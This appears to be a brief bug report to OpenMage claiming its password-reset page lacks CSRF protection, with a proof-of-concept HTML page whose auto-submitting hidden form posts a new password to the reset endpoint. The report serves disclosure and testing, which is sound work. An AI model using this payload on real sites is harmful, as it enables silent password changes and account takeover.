Hey OpenMage, the forgot password page is not protected against CSRF attack which can lead to changing password. Use the below form to test
<html>
<body>
<form action="https://demo.openmage.org/customer/account/resetpasswordpost/" method="POST">
<input type="hidden" name="password" value="password123" />
<input type="hidden" name="confirmation" value="password123" />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
https://demo.openmage.org/customer/account/forgotpassword/
Password reset via CSRF